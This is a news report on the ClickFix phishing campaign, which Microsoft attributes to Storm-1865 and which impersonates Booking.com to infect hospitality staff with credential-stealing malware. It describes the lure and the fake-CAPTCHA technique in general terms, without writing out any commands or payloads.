A sophisticated phishing campaign dubbed ClickFix has been infiltrating various hospitality firms by impersonating the popular travel website Booking.com. The cybercriminals behind this ongoing campaign have been identified as part of a threat cluster known as Storm-1865, according to Microsoft Threat Intelligence.
The primary targets of the ClickFix campaign are individuals working in hospitality organizations across regions such as North America, Oceania, South and Southeast Asia, and Europe, who are likely to have interactions with Booking.com. The attackers leverage a social engineering technique known as ClickFix to trick users into downloading malware by displaying fake error messages that instruct users to fix issues using deceptive commands.
The ClickFix technique effectively bypasses traditional security mechanisms by exploiting the user’s willingness to rectify problems themselves rather than seeking assistance from their IT department. The malware deployed in this campaign includes various families such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT, with some samples containing PowerShell, JavaScript, and portable executable content.
Microsoft researchers have noted that the ClickFix campaign shares similarities with previous Storm-1865 campaigns, particularly in its method of targeting hotel guests through impersonation of Booking.com. The addition of ClickFix to Storm-1865’s tactics demonstrates the evolution of their approach to circumvent phishing and malware security measures.
The ClickFix campaign initiates with malicious emails sent to targeted individuals, disguised as communications from Booking.com. These emails contain diverse content, ranging from negative guest reviews to account verification requests, enticing recipients to take action by clicking on links or opening PDF attachments supposedly linked to Booking.com.
Upon clicking on the link, victims are redirected to a fake CAPTCHA dialog box that prompts them to execute a command through a Windows Run window. This command leads to the download and execution of malicious code via the mshta.exe file, resulting in the installation of malware capable of stealing financial data and credentials.
The stolen information is then transmitted over a command and control channel, allowing cybercriminals to execute follow-up attacks, including fraudulent financial transactions. While Booking.com has confirmed that its systems have not been breached, some accommodation partners and customers have fallen victim to phishing attacks as a result of the campaign.
In response, Booking.com has emphasized the importance of verifying payment details and avoiding sharing sensitive information via email, chat messages, or phone calls. The company is actively working to educate its partners and customers about potential scams and provide guidance on staying protected while booking holidays.
As cyber threats continue to evolve, organizations must remain vigilant and implement robust cybersecurity measures to safeguard against phishing campaigns like ClickFix. By staying informed and adopting best practices, individuals and businesses can mitigate the risks posed by malicious actors seeking to exploit vulnerabilities in the digital landscape.